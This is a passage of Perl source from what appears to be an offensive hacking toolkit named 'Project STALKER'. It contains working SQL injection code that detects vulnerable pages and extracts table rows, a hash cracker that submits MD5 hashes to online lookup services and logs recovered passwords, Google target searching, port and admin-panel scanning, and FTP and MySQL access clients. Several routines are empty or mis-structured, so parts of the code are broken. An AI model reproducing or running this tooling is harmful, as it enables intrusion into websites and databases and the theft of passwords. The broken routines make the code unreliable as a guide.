"unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); print "[$_[1]] : $1 [$_[2]] : $2\n"; } else { print "\n\n[+] Extracting Finish\n\n"; &reload; } } } else { print "[-] Not Found any DATA\n\n"; }}} sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub base { $re = encode_base64($_[0]); } sub base_de { $re = decode_base64($_[0]); } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { }}} sub hex_en { my $string = $_[0]; $hex = '0x'; } } sub hex_de { $text =~ s/^0x//; } sub ascii_de { } sub getprocess { my %procesos; my $uno = Win32::OLE->new("WbemScripting.SWbemLocator"); my $dos = $uno->ConnectServer("","root\\cimv2"); foreach my $pro (in $dos->InstancesOf("Win32_Process")){ $procesos{$pro->{Caption}} = $pro->{ProcessId}; } } sub killprocess { my ($numb,$pid) = @_; if (Win32::Process::KillProcess($pid,$numb)) { } else { } } sub getip { } sub crackit { my $secret = $_[0]; print "[+] Cracking $_[0]\n\n"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\ /div ><div class ="result">$_[0]:(.+)<br\ />), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí : <b>(.*)<\ /b ><br><form action =\ "\">), } ); for my $data(keys %hash) { if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; saveyes("logs/pass-found.txt",$secret.":".$1); } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { saveyes("logs/pass-found.txt",$secret.":".$1); } } } print "\n[+] Finish\n"; } sub ftp { my ($ftp,$user,$pass) = @_; if (my $socket = Net::FTP->new($ftp)) { if ($socket->login($user,$pass)) { print "\n[+] Enter of the server FTP\n\n"; menu: print "\n\nftp>"; chomp (my $cmd = <stdin>); print "\n\n"; if ($cmd=~/help/) { print q( help : show information cd : change directory <dir> dir : list a directory mdkdir : create a directory <dir> rmdir : delete a directory <dir> pwd : directory del : delete a file <file> rename : change name of the a file <file1> <file2> size : size of the a file <file> put : upload a file <file> get : download a file <file> cdup : change dir <dir> exit : ?? ); } if ($cmd=~/dir/ig) { if (my @files = $socket->dir()) { for(@files) { print "[+] ".$_."\n"; } } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/pwd/ig) { print "[+] Path : ".$socket->pwd()."\n"; } if ($cmd=~/cd (.*)/ig) { if ($socket->cwd($1)) { print "[+] Directory changed\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/cdup/ig) { if (my $dir = $socket->cdup()) { print "\n\n[+] Directory changed\n\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/del (.*)/ig) { if ($socket->delete($1)) { print "[+] File deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rename (.*) (.*)/ig) { if ($socket->rename($1,$2)) { print "[+] File Updated\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/mkdir (.*)/ig) { if ($socket->mkdir($1)) { print "\n\n[+] Directory created\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rmdir (.*)/ig) { if ($socket->rmdir($1)) { print "\n\n[+] Directory deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/exit/ig) { next; } if ($cmd=~/get (.*) (.*)/ig) { print "\n\n[+] Downloading file\n\n"; if ($socket->get($1,$2)) { print "[+] Download completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/put (.*) (.*)/ig) { print "\n\n[+] Uploading file\n\n"; if ($socket->put($1,$2)) { print "[+] Upload completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/quit/) { next; } goto menu; } else { print "\n[-] Failed the login\n\n"; } } else { print "\n\n[-] Error\n\n"; } } sub scanpaths { my $urla = $_[0]; print "\n[+] Find paths in $urla\n\n\n"; my @urls = repes(get_links(toma($urla))); for $url(@urls) { my $web = $url; my ($scheme, $auth, $path, $query, $frag) = uri_split($url); if ($_[0] =~/$auth/ or $auth eq "") { if ($path=~/(.*)\/(.*)\.(.*)$/) { my $borrar = $2.".".$3; if ($web=~/(.*)$borrar/) { my $co = $1; unless ($co=~/$auth/) { $co = $urla.$co; } $code = toma($co); if ($code=~/Index Of/ig) { print "[Link] : ".$co."\n"; saveyes("logs/paths-found.txt",$co); }}}}} print "\n\n[+] Finish\n"; } sub scanport { my %ports = ("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } print "\n\n[+] Finish\n"; } sub scanpanel { print "[+] Scanning $_[0]\n\n\n"; for $path(@panels) { $code = tomax($_[0]."/".$path); if ($code->is_success) { print "[Link] : ".$_[0]."/".$path."\n"; saveyes("logs/panel-logs.txt",$_[0]."/".$path); } } print "\n\n[+] Finish\n"; } sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { push(@url,$l); } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { push(@founds,$2); } } my @founds = repes(@founds); return @founds; } sub sql { my ($pass1,$pass2) = ("+","--"); my $page = shift; $code1 = toma($page."-1".$pass1."union ".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; saveyes("logs/sql-logs.txt",$page); }} sub get_links { my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); return @links; sub agarrar { my ($a,%b) = @_; push(@links,values %b); } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } return @limpio; } sub head { cprint "\x0311"; #13 print "\n\n-- == Project STALKER == --\n\n"; cprint "\x030"; } sub copyright { cprint "\x0311"; #13 print"\n\n(C) Doddy Hackman 2011\n\n"; cprint "\x030"; } sub toma { return $nave->get($_[0])->content; } sub tomax { return $nave->get($_[0]); } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } sub conectar { my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1], Proto => "tcp",Timeout => 5); print $sockex $_[2]."\r\n"; $sockex->read($re,5000); $sockex->close; return $re."\r\n"; } sub enter { my ($host,$user,$pass) = @_; print "[+] Connecting to the server\n"; $info = "dbi:mysql::".$host.":3306"; if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) { print "\n[+] Enter in the database"; while(1) { print "\n\n\n[+] Query : "; chomp(my $ac = <stdin>); $enter->disconnect; print "\n\n[+] Closing connection\n\n"; last; } $re = $enter->prepare($ac); $re->execute(); my $total = $re->rows(); my @columnas = @{$re->{NAME}}; if ($total eq "-1") { print "\n\n[-] Query Error\n"; next; } else { print "\n\n[+] Result of the query\n"; if ($total eq 0) { print "\n\n[+] Not rows returned\n\n"; } else { print "\n\n[+] Rows returned : ".$total."\n\n\n"; for(@columnas) { print $_."\t\t"; } print "\n\n"; while (@row = $re->fetchrow_array) { for(@row) { print $_."\t\t"; } print "\n"; }}}} } else { print "\n[-] Error connecting\n"; }} sub saveyes { open (SAVE,">>".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub savefile { open (SAVE,">>logs/webs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub coleccionar { opendir DIR,$_[0]; my @archivos = readdir DIR; close DIR; return @archivos; } sub helpme { cprint "\x0310"; #13 print qq( Commands : getinfo getip <host> getlink <page> getprocess killprocess <name process> <pid process> conec <host> <port> <command> allow <host> paths <page> encodehex <text> decodehex <text> encodeascii <text> decodeascii <text> encodebase <text> decodebase <text> scanport <host> panel <page> getpass <hash> kobra <page> ftp <host> <user> <pass> mysql <host> <user> <pass> navegator scangoogle help exit ); cprint "\x030"; } # # The End ? #
|
|
|
|
|
|
|